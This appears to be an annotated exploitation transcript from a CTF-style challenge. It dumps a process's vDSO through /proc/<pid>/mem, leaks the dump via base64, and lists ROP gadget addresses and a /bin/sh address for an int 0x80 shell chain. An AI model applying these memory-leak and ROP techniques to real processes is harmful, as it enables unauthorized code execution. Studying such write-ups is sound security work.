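# Transcript restored to one command per line. Lines starting with "#   " are
# command output copied from the page, not commands.
#
# NOTE(review): reading /proc/<pid>/maps and /proc/<pid>/mem of another process
# is gated by the kernel's ptrace access checks (same credentials or
# CAP_SYS_PTRACE, and kernel.yama.ptrace_scope where Yama is enabled). The
# transcript does not show which user ran these commands.

# Find addresses
cat /proc/76/maps
#   08048000-08049000 r--p 00000000 00:02 317 /target
#   08049000-0804a000 r-xp 00001000 00:02 317 /target
#   0804a000-0804b000 rw-p 00002000 00:02 317 /target
#   f7ff8000-f7ffc000 r--p 00000000 00:00 0 [vvar]
#   f7ffc000-f7ffe000 r-xp 00000000 00:00 0 [vdso]
#   fffdd000-ffffe000 rw-p 00000000 00:00 0 [stack]

# Dump it
# bs=1 makes skip= and count= byte counts; 0x2000 bytes is the size of the
# [vdso] mapping listed above (f7ffc000-f7ffe000). The one-byte block size is
# also why the copy is slow.
dd if=/proc/76/mem of=vdso bs=1 skip=$((0xf7ffc000)) count=$((0x2000))
#   8192+0 records in
#   8192+0 records out
#   8192 bytes (8.0KB) copied, 0.901154 seconds, 8.9KB/s

# Compress and leak it
gzip vdso
base64 vdso.gz

# Decompress and check for gadgets
# '<base64-payload>' stands for the base64 text printed by the previous step.
echo '<base64-payload>' | base64 -d | gzip -d - > vdso
file vdso
ROPgadget --binary vdso | grep 'int 0x80'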
找到的ROP gadgets:
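# Addresses recorded for one specific process and one specific vDSO image.
# The listing was collapsed onto a single line, so every assignment after the
# first "#" comment was swallowed by that comment; it is restored here one
# statement per line with values unchanged.
#
# NOTE(review): the vDSO offsets below come from the ROPgadget output for the
# dumped image and hold only for that exact kernel build. The base address is
# the one shown in the /proc/76/maps listing and will differ wherever ASLR
# randomizes the vDSO mapping.

# Start of the [vdso] mapping (f7ffc000-f7ffe000 r-xp in the maps listing).
vdso_addr = 0xf7ffc000

# Absolute addresses, not vDSO-relative. Numerically they fall inside the
# /target mappings in the maps listing (r-xp 08049000-0804a000 and
# rw-p 0804a000-0804b000 respectively).
int_0x80_xor_eax_eax_ret_addr = 0x8049010
bin_sh_addr = 0x804a800

# 0x0000057a : pop edx ; pop ecx ; ret
pop_edx_pop_ecx_ret_addr = vdso_addr + 0x57a

# 0x00000cca : mov dword ptr [edx], ecx ; add esp, 0x34 ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
mov_dword_ptr_edx_ecx_ret_addr = vdso_addr + 0xcca

# 0x00000ccb : or al, byte ptr [ebx + 0x5e5b34c4] ; pop edi ; pop ebp ; ret
# One byte past the entry above: the same bytes decoded from a different start.
or_al_byte_ptr_ebx_pop_edi_pop_ebp_ret_addr = vdso_addr + 0xccb

# 0x0000015cd : pop ebx ; pop esi ; pop ebp ; ret
# Name kept as on the page (it lacks the "_addr" suffix the others carry).
pop_ebx_pop_esi_pop_ebp_ret = vdso_addr + 0x15cd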